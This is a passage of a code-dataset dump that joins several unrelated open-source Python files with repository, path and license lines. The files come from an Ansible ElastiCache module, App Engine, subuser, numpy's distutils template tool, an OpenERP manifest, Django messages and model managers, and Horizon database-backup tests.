    )

    module = AnsibleModule(argument_spec=argument_spec)

    if not HAS_BOTO3:
        # Fixed message: this module requires boto3, not the legacy boto.
        module.fail_json(msg='boto3 required for this module')

    name = module.params.get('name')
    state = module.params.get('state')
    replication_id = module.params.get('replication_id')
    cluster_id = module.params.get('cluster_id')
    target = module.params.get('target')
    bucket = module.params.get('bucket')

    # Retrieve any AWS settings from the environment.
    region, ec2_url, aws_connect_kwargs = get_aws_connection_info(module, boto3=True)

    if not region:
        module.fail_json(msg=str("Either region or AWS_REGION or EC2_REGION environment variable or boto config aws_region or ec2_region must be set."))

    connection = boto3_conn(module, conn_type='client',
                            resource='elasticache', region=region,
                            endpoint=ec2_url, **aws_connect_kwargs)

    changed = False
    response = {}

    if state == 'present':
        if not all((replication_id, cluster_id)):
            module.fail_json(msg="The state 'present' requires options: 'replication_id' and 'cluster_id'")
        response, changed = create(module, connection, replication_id, cluster_id, name)
    elif state == 'absent':
        response, changed = delete(module, connection, name)
    elif state == 'copy':
        if not all((target, bucket)):
            module.fail_json(msg="The state 'copy' requires options: 'target' and 'bucket'.")
        response, changed = copy(module, connection, name, target, bucket)

    facts_result = dict(changed=changed, **camel_dict_to_snake_dict(response))

    module.exit_json(**facts_result)


if __name__ == '__main__':
    main()
gpl-3.0
GdZ/scriptfile
software/googleAppEngine/google/appengine/api/prospective_search/error_pb.py
27
2614
#!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#

# Machine-generated protocol-buffer message for the prospective_search
# error codes (Python 2 / App Engine ProtocolBuffer runtime). Do not edit
# by hand; the message carries no fields, only the ErrorCode enum.

from google.net.proto import ProtocolBuffer
import array
import dummy_thread as thread

__pychecker__ = """maxreturns=0 maxbranches=0 no-callinit
                   unusednames=printElemNumber,debug_strs no-special"""

# Older runtimes lack ExtendableProtocolMessage; fall back to the plain
# ProtocolMessage base in that case.
if hasattr(ProtocolBuffer, 'ExtendableProtocolMessage'):
  _extension_runtime = True
  _ExtendableProtocolMessage = ProtocolBuffer.ExtendableProtocolMessage
else:
  _extension_runtime = False
  _ExtendableProtocolMessage = ProtocolBuffer.ProtocolMessage

class Error(ProtocolBuffer.ProtocolMessage):

  # ErrorCode enum values.
  BAD_REQUEST  =    1
  INTERNAL_ERROR =    2

  _ErrorCode_NAMES = {
    1: "BAD_REQUEST",
    2: "INTERNAL_ERROR",
  }

  def ErrorCode_Name(cls, x): return cls._ErrorCode_NAMES.get(x, "")
  ErrorCode_Name = classmethod(ErrorCode_Name)


  def __init__(self, contents=None):
    pass
    if contents is not None: self.MergeFromString(contents)

  def MergeFrom(self, x):
    assert x is not self

  def Equals(self, x):
    # No fields: any two Error instances compare equal.
    if x is self: return 1
    return 1

  def IsInitialized(self, debug_strs=None):
    # No required fields, so always initialized.
    initialized = 1
    return initialized

  def ByteSize(self):
    n = 0
    return n

  def ByteSizePartial(self):
    n = 0
    return n

  def Clear(self):
    pass

  def OutputUnchecked(self, out):
    pass

  def OutputPartial(self, out):
    pass

  def TryMerge(self, d):
    # Skip every tag: this message defines no fields of its own.
    while d.avail() > 0:
      tt = d.getVarInt32()
      if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
      d.skipData(tt)


  def __str__(self, prefix="", printElemNumber=0):
    res=""
    return res


  def _BuildTagLookupTable(sparse, maxtag, default=None):
    return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])


  _TEXT = _BuildTagLookupTable({
    0: "ErrorCode",
  }, 0)

  _TYPES = _BuildTagLookupTable({
    0: ProtocolBuffer.Encoder.NUMERIC,
  }, 0, ProtocolBuffer.Encoder.MAX_TYPE)

  _STYLE = """"""
  _STYLE_CONTENT_TYPE = """"""
  _PROTO_DESCRIPTOR_NAME = 'apphosting.prospective_search.Error'
if _extension_runtime:
  pass

__all__ = ['Error']
mit
weaver-viii/subuser
logic/subuserlib/subuser.py
2
3683
#!/usr/bin/env python
# This file should be compatible with both Python 2 and 3.
# If it is not, please file a bug report.

"""
High level operations on subusers.
"""

#external imports
import sys
import os
import shutil
#internal imports
import subuserlib.resolve
import subuserlib.classes.subuser
import subuserlib.verify
import subuserlib.update
import subuserlib.classes.docker.dockerDaemon as dockerDaemon

def add(user,subuserName,imageSourceIdentifier,permissionsAccepter):
  """
  Add a new subuser named ``subuserName`` built from the image source named by
  ``imageSourceIdentifier``.

  Exits the process with an error message when the name is reserved (starts
  with ``!``), already taken, or the image source cannot be resolved.
  """
  if subuserName.startswith("!"):
    # Fixed grammar of the user-facing message ("A subusers may not have names...").
    sys.exit("Subusers may not have names beginning with ! as these names are reserved for internal use.")
  if subuserName in user.getRegistry().getSubusers():
    sys.exit("A subuser named "+subuserName+" already exists.")
  user.getRegistry().logChange("Adding subuser "+subuserName+" "+imageSourceIdentifier)
  try:
    imageSource = subuserlib.resolve.resolveImageSource(user,imageSourceIdentifier)
  except KeyError as keyError:
    sys.exit("Could not add subuser. The image source "+imageSourceIdentifier+" does not exist.\n"+str(keyError))
  addFromImageSource(user,subuserName,imageSource,permissionsAccepter)

def addFromImageSource(user,subuserName,imageSource,permissionsAccepter):
  """
  Add and verify a subuser built from an already-resolved image source,
  committing the registry on success and rolling back to HEAD when the image
  build fails.
  """
  try:
    addFromImageSourceNoVerify(user,subuserName,imageSource)
    subuserlib.verify.verify(user,subuserNames=[subuserName],permissionsAccepter=permissionsAccepter)
    user.getRegistry().commit()
  except dockerDaemon.ImageBuildException as e:
    print("Adding subuser failed.")
    print(str(e))
    # Roll the registry back so the half-added subuser does not linger.
    subuserlib.update.checkoutNoCommit(user,"HEAD")

def addFromImageSourceNoVerify(user,subuserName,imageSource):
  """
  Register the subuser object without verifying or committing; callers are
  responsible for running verify and committing the registry afterwards.
  """
  subuser = subuserlib.classes.subuser.Subuser(user,subuserName,imageSource,None,False,False,[])
  user.getRegistry().getSubusers()[subuserName] = subuser

def remove(user,subuserNames):
  """
  Remove each named subuser: its service subusers, its service locks, and its
  permission files. Verifies and commits the registry if anything was removed.
  The subuser's home directory and image are intentionally left in place; hints
  for removing them are logged instead.
  """
  didSomething = False
  for subuserName in subuserNames:
    if subuserName in user.getRegistry().getSubusers():
      user.getRegistry().logChange("Removing subuser "+str(subuserName))
      try:
        subuserHome = user.getRegistry().getSubusers()[subuserName].getHomeDirOnHost()
        if subuserHome and os.path.exists(subuserHome):
          # Typo fix: "issule" -> "issue".
          user.getRegistry().logChange(" If you wish to remove the subusers home directory, issue the command $ rm -r "+subuserHome)
      except Exception:
        # Best effort only: was a bare ``except:`` which also swallowed
        # SystemExit/KeyboardInterrupt; failure to locate the home dir must
        # not block removal.
        pass
      user.getRegistry().logChange(" If you wish to remove the subusers image, issue the command $ subuser remove-old-images")
      subuser = user.getRegistry().getSubusers()[subuserName]
      # Remove any service subusers that belong to this subuser.
      for serviceSubuser in subuser.getServiceSubuserNames():
        try:
          user.getRegistry().getSubusers()[serviceSubuser].removePermissions()
          del user.getRegistry().getSubusers()[serviceSubuser]
        except KeyError:
          pass
      # Remove service locks
      try:
        shutil.rmtree(os.path.join(user.getConfig()["lock-dir"],"services",subuserName))
      except OSError:
        pass
      # Remove permission files
      user.getRegistry().getSubusers()[subuserName].removePermissions()
      del user.getRegistry().getSubusers()[subuserName]
      didSomething = True
    else:
      print("Cannot remove: subuser "+subuserName+" does not exist.")
  if didSomething:
    subuserlib.verify.verify(user)
    user.getRegistry().commit()

def setExecutableShortcutInstalled(user,subuserName,installed):
  """
  Install (``installed=True``) or remove an executable shortcut for the
  subuser, then verify and commit the registry.
  """
  if installed:
    user.getRegistry().logChange("Creating shortcut for subuser "+subuserName)
  else:
    user.getRegistry().logChange("Removing shortcut for subuser "+subuserName)
  user.getRegistry().getSubusers()[subuserName].setExecutableShortcutInstalled(installed)
  subuserlib.verify.verify(user)
  user.getRegistry().commit()
lgpl-3.0
CMartelLML/numpy
numpy/distutils/from_template.py
164
7822
#!/usr/bin/python
"""

process_file(filename)

  takes templated file .xxx.src and produces .xxx file where .xxx
  is .pyf .f90 or .f using the following template rules:

  '<..>' denotes a template.

  All function and subroutine blocks in a source file with names that
  contain '<..>' will be replicated according to the rules in '<..>'.

  The number of comma-separated words in '<..>' will determine the number of
  replicates.

  '<..>' may have two different forms, named and short. For example,

  named:
   <p=d,s,z,c> where anywhere inside a block '<p>' will be replaced with
   'd', 's', 'z', and 'c' for each replicate of the block.

   <_c>  is already defined: <_c=s,d,c,z>
   <_t>  is already defined: <_t=real,double precision,complex,double complex>

  short:
   <s,d,c,z>, a short form of the named, useful when no <p> appears inside
   a block.

  In general, '<..>' contains a comma separated list of arbitrary
  expressions. If these expression must contain a comma|leftarrow|rightarrow,
  then prepend the comma|leftarrow|rightarrow with a backslash.

  If an expression matches '\\<index>' then it will be replaced
  by <index>-th expression.

  Note that all '<..>' forms in a block must have the same number of
  comma-separated entries.

 Predefined named template rules:
  <prefix=s,d,c,z>
  <ftype=real,double precision,complex,double complex>
  <ftypereal=real,double precision,\\0,\\1>
  <ctype=float,double,complex_float,complex_double>
  <ctypereal=float,double,\\0,\\1>

"""
from __future__ import division, absolute_import, print_function

__all__ = ['process_str', 'process_file']

import os
import sys
import re

# Fixed-form Fortran: a routine may start at column 1 or as a continuation
# line ('$' or '*' in column 6, i.e. after five spaces).
routine_start_re = re.compile(r'(\n|\A)((     (\$|\*))|)\s*(subroutine|function)\b', re.I)
routine_end_re = re.compile(r'\n\s*end\s*(subroutine|function)\b.*(\n|\Z)', re.I)
function_start_re = re.compile(r'\n     (\$|\*)\s*function\b', re.I)

def parse_structure(astr):
    """ Return a list of tuples for each function or subroutine
    each tuple is the start and end of a subroutine or function to be
    expanded.
    """

    spanlist = []
    ind = 0
    while True:
        m = routine_start_re.search(astr, ind)
        if m is None:
            break
        start = m.start()
        if function_start_re.match(astr, start, m.end()):
            # The match began on a continuation line; walk backwards to the
            # first line of the statement.
            while True:
                i = astr.rfind('\n', ind, start)
                if i==-1:
                    break
                start = i
                if astr[i:i+7]!='\n     $':
                    break
            start += 1
        m = routine_end_re.search(astr, m.end())
        ind = end = m and m.end()-1 or len(astr)
        spanlist.append((start, end))
    return spanlist

template_re = re.compile(r"<\s*(\w[\w\d]*)\s*>")
named_re = re.compile(r"<\s*(\w[\w\d]*)\s*=\s*(.*?)\s*>")
list_re = re.compile(r"<\s*((.*?))\s*>")

def find_repl_patterns(astr):
    """Collect all named templates '<name=list>' from *astr* into a dict."""
    reps = named_re.findall(astr)
    names = {}
    for rep in reps:
        name = rep[0].strip() or unique_key(names)
        # Bug fix: '\,' was an invalid escape sequence (DeprecationWarning on
        # Python 3, a SyntaxError in future versions); use a raw string.
        repl = rep[1].replace(r'\,', '@comma@')
        thelist = conv(repl)
        names[name] = thelist
    return names

item_re = re.compile(r"\A\\(?P<index>\d+)\Z")
def conv(astr):
    """Normalize a comma separated list, resolving '\\<index>' back-references."""
    b = astr.split(',')
    l = [x.strip() for x in b]
    for i in range(len(l)):
        m = item_re.match(l[i])
        if m:
            j = int(m.group('index'))
            l[i] = l[j]
    return ','.join(l)

def unique_key(adict):
    """ Obtain a unique key given a dictionary."""
    allkeys = list(adict.keys())
    done = False
    n = 1
    while not done:
        newkey = '__l%s' % (n)
        if newkey in allkeys:
            n += 1
        else:
            done = True
    return newkey

template_name_re = re.compile(r'\A\s*(\w[\w\d]*)\s*\Z')
def expand_sub(substr, names):
    """Expand every template in one routine block, replicating it once per
    entry of the (shared) replacement lists."""
    # Bug fix: raw strings for '\>' and '\<' (invalid escape sequences).
    substr = substr.replace(r'\>', '@rightarrow@')
    substr = substr.replace(r'\<', '@leftarrow@')
    lnames = find_repl_patterns(substr)
    substr = named_re.sub(r"<\1>", substr)  # get rid of definition templates

    def listrepl(mobj):
        thelist = conv(mobj.group(1).replace(r'\,', '@comma@'))
        if template_name_re.match(thelist):
            return "<%s>" % (thelist)
        name = None
        for key in lnames.keys():    # see if list is already in dictionary
            if lnames[key] == thelist:
                name = key
        if name is None:      # this list is not in the dictionary yet
            name = unique_key(lnames)
            lnames[name] = thelist
        return "<%s>" % name

    substr = list_re.sub(listrepl, substr)  # convert all lists to named templates
                                            # newnames are constructed as needed

    numsubs = None
    base_rule = None
    rules = {}
    for r in template_re.findall(substr):
        if r not in rules:
            thelist = lnames.get(r, names.get(r, None))
            if thelist is None:
                raise ValueError('No replicates found for <%s>' % (r))
            if r not in names and not thelist.startswith('_'):
                names[r] = thelist
            rule = [i.replace('@comma@', ',') for i in thelist.split(',')]
            num = len(rule)

            if numsubs is None:
                numsubs = num
                rules[r] = rule
                base_rule = r
            elif num == numsubs:
                rules[r] = rule
            else:
                print("Mismatch in number of replacements (base <%s=%s>)"
                      " for <%s=%s>. Ignoring." %
                      (base_rule, ','.join(rules[base_rule]), r, thelist))
    if not rules:
        return substr

    def namerepl(mobj):
        name = mobj.group(1)
        return rules.get(name, (k+1)*[name])[k]

    newstr = ''
    for k in range(numsubs):
        newstr += template_re.sub(namerepl, substr) + '\n\n'

    newstr = newstr.replace('@rightarrow@', '>')
    newstr = newstr.replace('@leftarrow@', '<')
    return newstr

def process_str(allstr):
    """Expand all templated routine blocks in the source string *allstr*."""
    newstr = allstr
    writestr = '' #_head # using _head will break free-format files

    struct = parse_structure(newstr)

    oldend = 0
    names = {}
    names.update(_special_names)
    for sub in struct:
        writestr += newstr[oldend:sub[0]]
        names.update(find_repl_patterns(newstr[oldend:sub[0]]))
        writestr += expand_sub(newstr[sub[0]:sub[1]], names)
        oldend = sub[1]
    writestr += newstr[oldend:]

    return writestr

include_src_re = re.compile(r"(\n|\A)\s*include\s*['\"](?P<name>[\w\d./\\]+[.]src)['\"]", re.I)

def resolve_includes(source):
    """Return the lines of *source* with `include '*.src'` lines expanded
    recursively (relative paths resolved against *source*'s directory)."""
    d = os.path.dirname(source)
    fid = open(source)
    lines = []
    for line in fid:
        m = include_src_re.match(line)
        if m:
            fn = m.group('name')
            if not os.path.isabs(fn):
                fn = os.path.join(d, fn)
            if os.path.isfile(fn):
                print('Including file', fn)
                lines.extend(resolve_includes(fn))
            else:
                lines.append(line)
        else:
            lines.append(line)
    fid.close()
    return lines

def process_file(source):
    """Process the templated file *source* and return the expanded text."""
    lines = resolve_includes(source)
    return process_str(''.join(lines))

_special_names = find_repl_patterns('''
<_c=s,d,c,z>
<_t=real,double precision,complex,double complex>
<prefix=s,d,c,z>
<ftype=real,double precision,complex,double complex>
<ctype=float,double,complex_float,complex_double>
<ftypereal=real,double precision,\\0,\\1>
<ctypereal=float,double,\\0,\\1>
''')

if __name__ == "__main__":

    try:
        file = sys.argv[1]
    except IndexError:
        fid = sys.stdin
        outfile = sys.stdout
    else:
        fid = open(file, 'r')
        (base, ext) = os.path.splitext(file)
        newname = base
        outfile = open(newname, 'w')

    allstr = fid.read()
    writestr = process_str(allstr)
    outfile.write(writestr)
bsd-3-clause
tsabi/Odoo-tsabi-fixes
addons/email_template/__openerp__.py
64
3160
# -*- coding: utf-8 -*-
##############################################################################
#
#    OpenERP, Open Source Management Solution
#    Copyright (C) 2009 Sharoon Thomas
#    Copyright (C) 2010-Today OpenERP SA (<http://www.openerp.com>)
#
#    This program is free software: you can redistribute it and/or modify
#    it under the terms of the GNU General Public License as published by
#    the Free Software Foundation, either version 3 of the License, or
#    (at your option) any later version.
#
#    This program is distributed in the hope that it will be useful,
#    but WITHOUT ANY WARRANTY; without even the implied warranty of
#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#    GNU General Public License for more details.
#
#    You should have received a copy of the GNU General Public License
#    along with this program.  If not, see <http://www.gnu.org/licenses/>
#
##############################################################################

# Addon manifest for the 'email_template' module; read (not imported) by the
# OpenERP module loader.
{
    'name' : 'Email Templates',
    'version' : '1.1',
    'author' : 'OpenERP,OpenLabs',
    'website' : 'http://openerp.com',
    'category' : 'Marketing',
    # Only hard dependency is the core mail module.
    'depends' : ['mail'],
    'description': """
Email Templating (simplified version of the original Power Email by Openlabs).
==============================================================================

Lets you design complete email templates related to any OpenERP document (Sale
Orders, Invoices and so on), including sender, recipient, subject, body (HTML and
Text). You may also automatically attach files to your templates, or print and
attach a report.

For advanced use, the templates may include dynamic attributes of the document
they are related to. For example, you may use the name of a Partner's country
when writing to them, also providing a safe default in case the attribute is
not defined. Each template contains a built-in assistant to help with the
inclusion of these dynamic values.

If you enable the option, a composition assistant will also appear in the sidebar
of the OpenERP documents to which the template applies (e.g. Invoices).
This serves as a quick way to send a new email based on the template, after
reviewing and adapting the contents, if needed.
This composition assistant will also turn into a mass mailing system when called
for multiple documents at once.

These email templates are also at the heart of the marketing campaign system
(see the ``marketing_campaign`` application), if you need to automate larger
campaigns on any OpenERP document.

**Technical note:** only the templating system of the original Power Email by
Openlabs was kept.
    """,
    # Views, wizards and ACLs loaded at install time, in order.
    'data': [
        'wizard/email_template_preview_view.xml',
        'email_template_view.xml',
        'res_partner_view.xml',
        'ir_actions_view.xml',
        'wizard/mail_compose_message_view.xml',
        'security/ir.model.access.csv'
    ],
    'demo': [],
    'installable': True,
    # auto_install: installed automatically once all dependencies ('mail') are.
    'auto_install': True,
    'images': ['images/1_email_account.jpeg','images/2_email_template.jpeg','images/3_emails.jpeg'],
}

# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
agpl-3.0
betoesquivel/fil2014
build/django/django/contrib/messages/storage/fallback.py
627
2171
from django.contrib.messages.storage.base import BaseStorage
from django.contrib.messages.storage.cookie import CookieStorage
from django.contrib.messages.storage.session import SessionStorage


class FallbackStorage(BaseStorage):
    """
    Message storage that prefers the first backend and spills whatever does
    not fit into each subsequent backend, in order.
    """
    storage_classes = (CookieStorage, SessionStorage)

    def __init__(self, *args, **kwargs):
        super(FallbackStorage, self).__init__(*args, **kwargs)
        # Instantiate one backend per configured class, preserving order.
        self.storages = []
        for storage_class in self.storage_classes:
            self.storages.append(storage_class(*args, **kwargs))
        # Backends that actually held messages; these must be flushed on store.
        self._used_storages = set()

    def _get(self, *args, **kwargs):
        """
        Collect messages from every backend into one list.

        Stops early as soon as a backend reports it was never used
        (messages is None) or that it held the complete set.
        """
        collected = []
        for backend in self.storages:
            messages, everything_retrieved = backend._get()
            # An untouched backend means no later backend was used either.
            if messages is None:
                break
            if messages:
                self._used_storages.add(backend)
                collected.extend(messages)
            # This backend contained the full remainder; we are done.
            if everything_retrieved:
                break
        return collected, everything_retrieved

    def _store(self, messages, response, *args, **kwargs):
        """
        Store the messages, returning any that no backend accepted.

        Each backend gets whatever the previous one could not hold. Backends
        that previously contained messages but receive none now are cleared.
        """
        remaining = messages
        for backend in self.storages:
            if remaining:
                remaining = backend._store(remaining, response,
                                           remove_oldest=False)
            elif backend in self._used_storages:
                # Nothing left to store, but this backend held messages
                # before — flush it so stale messages do not reappear.
                backend._store([], response)
                self._used_storages.remove(backend)
        return remaining
mit
phoebusliang/parallel-lettuce
tests/integration/lib/Django-1.2.5/django/db/models/manager.py
306
7872
from django.utils import copycompat as copy
from django.conf import settings
from django.db import router
from django.db.models.query import QuerySet, EmptyQuerySet, insert_query, RawQuerySet
from django.db.models import signals
from django.db.models.fields import FieldDoesNotExist


def ensure_default_manager(sender, **kwargs):
    """
    Ensures that a Model subclass contains a default manager and sets the
    _default_manager attribute on the class. Also sets up the _base_manager
    points to a plain Manager instance (which could be the same as
    _default_manager if it's not a subclass of Manager).
    """
    cls = sender
    if cls._meta.abstract:
        return
    if not getattr(cls, '_default_manager', None):
        # Create the default manager, if needed.
        try:
            cls._meta.get_field('objects')
            raise ValueError("Model %s must specify a custom Manager, because it has a field named 'objects'" % cls.__name__)
        except FieldDoesNotExist:
            pass
        cls.add_to_class('objects', Manager())
        cls._base_manager = cls.objects
    elif not getattr(cls, '_base_manager', None):
        default_mgr = cls._default_manager.__class__
        if (default_mgr is Manager or
                getattr(default_mgr, "use_for_related_fields", False)):
            cls._base_manager = cls._default_manager
        else:
            # Default manager isn't a plain Manager class, or a suitable
            # replacement, so we walk up the base class hierarchy until we hit
            # something appropriate.
            for base_class in default_mgr.mro()[1:]:
                if (base_class is Manager or
                        getattr(base_class, "use_for_related_fields", False)):
                    cls.add_to_class('_base_manager', base_class())
                    return
            raise AssertionError("Should never get here. Please report a bug, including your model and model manager setup.")

signals.class_prepared.connect(ensure_default_manager)

class Manager(object):
    """Base manager: the table-level entry point for model queries.

    Almost every public method is a thin proxy onto a fresh QuerySet from
    get_query_set(); subclasses customise behaviour by overriding that one
    method.
    """
    # Tracks each time a Manager instance is created. Used to retain order.
    creation_counter = 0

    def __init__(self):
        super(Manager, self).__init__()
        self._set_creation_counter()
        self.model = None
        self._inherited = False
        self._db = None

    def contribute_to_class(self, model, name):
        # TODO: Use weakref because of possible memory leak / circular reference.
        self.model = model
        setattr(model, name, ManagerDescriptor(self))
        # The first manager defined on a model (lowest creation_counter)
        # becomes its default manager.
        if not getattr(model, '_default_manager', None) or self.creation_counter < model._default_manager.creation_counter:
            model._default_manager = self
        if model._meta.abstract or (self._inherited and not self.model._meta.proxy):
            model._meta.abstract_managers.append((self.creation_counter, name,
                    self))
        else:
            model._meta.concrete_managers.append((self.creation_counter, name,
                self))

    def _set_creation_counter(self):
        """
        Sets the creation counter value for this instance and increments the
        class-level copy.
        """
        self.creation_counter = Manager.creation_counter
        Manager.creation_counter += 1

    def _copy_to_model(self, model):
        """
        Makes a copy of the manager and assigns it to 'model', which should be
        a child of the existing model (used when inheriting a manager from an
        abstract base class).
        """
        assert issubclass(model, self.model)
        mgr = copy.copy(self)
        mgr._set_creation_counter()
        mgr.model = model
        mgr._inherited = True
        return mgr

    def db_manager(self, using):
        # Shallow copy pinned to a specific database alias.
        obj = copy.copy(self)
        obj._db = using
        return obj

    @property
    def db(self):
        # Explicitly pinned database, or whatever the router picks for reads.
        return self._db or router.db_for_read(self.model)

    #######################
    # PROXIES TO QUERYSET #
    #######################

    def get_empty_query_set(self):
        return EmptyQuerySet(self.model, using=self._db)

    def get_query_set(self):
        """Returns a new QuerySet object.  Subclasses can override this method
        to easily customize the behavior of the Manager.
        """
        return QuerySet(self.model, using=self._db)

    def none(self):
        return self.get_empty_query_set()

    def all(self):
        return self.get_query_set()

    def count(self):
        return self.get_query_set().count()

    def dates(self, *args, **kwargs):
        return self.get_query_set().dates(*args, **kwargs)

    def distinct(self, *args, **kwargs):
        return self.get_query_set().distinct(*args, **kwargs)

    def extra(self, *args, **kwargs):
        return self.get_query_set().extra(*args, **kwargs)

    def get(self, *args, **kwargs):
        return self.get_query_set().get(*args, **kwargs)

    def get_or_create(self, **kwargs):
        return self.get_query_set().get_or_create(**kwargs)

    def create(self, **kwargs):
        return self.get_query_set().create(**kwargs)

    def filter(self, *args, **kwargs):
        return self.get_query_set().filter(*args, **kwargs)

    def aggregate(self, *args, **kwargs):
        return self.get_query_set().aggregate(*args, **kwargs)

    def annotate(self, *args, **kwargs):
        return self.get_query_set().annotate(*args, **kwargs)

    def complex_filter(self, *args, **kwargs):
        return self.get_query_set().complex_filter(*args, **kwargs)

    def exclude(self, *args, **kwargs):
        return self.get_query_set().exclude(*args, **kwargs)

    def in_bulk(self, *args, **kwargs):
        return self.get_query_set().in_bulk(*args, **kwargs)

    def iterator(self, *args, **kwargs):
        return self.get_query_set().iterator(*args, **kwargs)

    def latest(self, *args, **kwargs):
        return self.get_query_set().latest(*args, **kwargs)

    def order_by(self, *args, **kwargs):
        return self.get_query_set().order_by(*args, **kwargs)

    def select_related(self, *args, **kwargs):
        return self.get_query_set().select_related(*args, **kwargs)

    def values(self, *args, **kwargs):
        return self.get_query_set().values(*args, **kwargs)

    def values_list(self, *args, **kwargs):
        return self.get_query_set().values_list(*args, **kwargs)

    def update(self, *args, **kwargs):
        return self.get_query_set().update(*args, **kwargs)

    def reverse(self, *args, **kwargs):
        return self.get_query_set().reverse(*args, **kwargs)

    def defer(self, *args, **kwargs):
        return self.get_query_set().defer(*args, **kwargs)

    def only(self, *args, **kwargs):
        return self.get_query_set().only(*args, **kwargs)

    def using(self, *args, **kwargs):
        return self.get_query_set().using(*args, **kwargs)

    def exists(self, *args, **kwargs):
        return self.get_query_set().exists(*args, **kwargs)

    def _insert(self, values, **kwargs):
        return insert_query(self.model, values, **kwargs)

    def _update(self, values, **kwargs):
        return self.get_query_set()._update(values, **kwargs)

    def raw(self, raw_query, params=None, *args, **kwargs):
        return RawQuerySet(raw_query=raw_query, model=self.model, params=params, using=self._db, *args, **kwargs)

class ManagerDescriptor(object):
    # This class ensures managers aren't accessible via model instances.
    # For example, Poll.objects works, but poll_obj.objects raises AttributeError.
    def __init__(self, manager):
        self.manager = manager

    def __get__(self, instance, type=None):
        # Bug fix: was ``instance != None`` — identity comparison with ``is``
        # is correct for None (PEP 8) and avoids invoking custom __ne__.
        if instance is not None:
            raise AttributeError("Manager isn't accessible via %s instances" % type.__name__)
        return self.manager

class EmptyManager(Manager):
    """Manager whose queries always yield an empty QuerySet."""
    def get_query_set(self):
        return self.get_empty_query_set()
gpl-3.0
JioCloud/horizon
openstack_dashboard/dashboards/project/database_backups/tests.py
11
6384
# Copyright 2013 Mirantis Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
#    http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.

# NOTE(review): Python 2 only — uses the builtin ``unicode`` type and mox
# record/replay stubs, whose expectation order must match the code under test.
from django.core.urlresolvers import reverse
from django import http

from mox import IsA  # noqa

from openstack_dashboard import api
from openstack_dashboard.test import helpers as test

INDEX_URL = reverse('horizon:project:database_backups:index')
BACKUP_URL = reverse('horizon:project:database_backups:create')
DETAILS_URL = reverse('horizon:project:database_backups:detail', args=['id'])


class DatabasesBackupsTests(test.TestCase):
    """View tests for the Trove database-backups panel (index, create,
    incremental create, and detail pages), with the trove API stubbed out."""

    @test.create_stubs({api.trove: ('backup_list', 'instance_get')})
    def test_index(self):
        # Index page lists backups and resolves each backup's instance.
        api.trove.backup_list(IsA(http.HttpRequest))\
            .AndReturn(self.database_backups.list())

        api.trove.instance_get(IsA(http.HttpRequest), IsA(str))\
            .MultipleTimes()\
            .AndReturn(self.databases.first())

        self.mox.ReplayAll()
        res = self.client.get(INDEX_URL)
        self.assertTemplateUsed(res, 'project/database_backups/index.html')

    @test.create_stubs({api.trove: ('backup_list',)})
    def test_index_exception(self):
        # An API failure should render the page with an error message,
        # not a 500.
        api.trove.backup_list(IsA(http.HttpRequest))\
            .AndRaise(self.exceptions.trove)

        self.mox.ReplayAll()
        res = self.client.get(INDEX_URL)

        self.assertTemplateUsed(
            res, 'project/database_backups/index.html')
        self.assertEqual(res.status_code, 200)
        self.assertMessageCount(res, error=1)

    @test.create_stubs({
        api.trove: ('instance_list', 'backup_list', 'backup_create')})
    def test_launch_backup(self):
        # Full (non-incremental) backup: parent is the empty string.
        api.trove.instance_list(IsA(http.HttpRequest))\
            .AndReturn(self.databases.list())
        api.trove.backup_list(IsA(http.HttpRequest)) \
            .AndReturn(self.database_backups.list())

        database = self.databases.first()
        backupName = "NewBackup"
        backupDesc = "Backup Description"

        api.trove.backup_create(
            IsA(http.HttpRequest),
            backupName,
            database.id,
            backupDesc,
            "")

        self.mox.ReplayAll()
        post = {
            'name': backupName,
            'instance': database.id,
            'description': backupDesc,
            'parent': ""
        }

        res = self.client.post(BACKUP_URL, post)
        self.assertNoFormErrors(res)
        self.assertRedirectsNoFollow(res, INDEX_URL)

    @test.create_stubs({api.trove: ('instance_list', 'backup_list')})
    def test_launch_backup_exception(self):
        # Instance listing fails: the form still renders, with an error.
        api.trove.instance_list(IsA(http.HttpRequest))\
            .AndRaise(self.exceptions.trove)
        api.trove.backup_list(IsA(http.HttpRequest)) \
            .AndReturn(self.database_backups.list())

        self.mox.ReplayAll()

        res = self.client.get(BACKUP_URL)
        self.assertMessageCount(res, error=1)
        self.assertTemplateUsed(res, 'project/database_backups/backup.html')

    @test.create_stubs({
        api.trove: ('instance_list', 'backup_list', 'backup_create')})
    def test_launch_backup_incr(self):
        # Incremental backup: an existing backup is passed as the parent.
        api.trove.instance_list(IsA(http.HttpRequest)) \
            .AndReturn(self.databases.list())
        api.trove.backup_list(IsA(http.HttpRequest)) \
            .AndReturn(self.database_backups.list())

        database = self.databases.first()
        backupName = "NewBackup"
        backupDesc = "Backup Description"
        backupParent = self.database_backups.first()

        api.trove.backup_create(
            IsA(http.HttpRequest),
            backupName,
            database.id,
            backupDesc,
            backupParent.id)

        self.mox.ReplayAll()
        post = {
            'name': backupName,
            'instance': database.id,
            'description': backupDesc,
            'parent': backupParent.id,
        }

        res = self.client.post(BACKUP_URL, post)
        self.assertNoFormErrors(res)
        self.assertRedirectsNoFollow(res, INDEX_URL)

    @test.create_stubs({api.trove: ('backup_get', 'instance_get')})
    def test_detail_backup(self):
        api.trove.backup_get(IsA(http.HttpRequest), IsA(unicode))\
            .AndReturn(self.database_backups.first())

        api.trove.instance_get(IsA(http.HttpRequest), IsA(str))\
            .AndReturn(self.databases.first())

        self.mox.ReplayAll()
        res = self.client.get(DETAILS_URL)

        self.assertTemplateUsed(res, 'project/database_backups/details.html')

    @test.create_stubs({api.trove: ('backup_get',)})
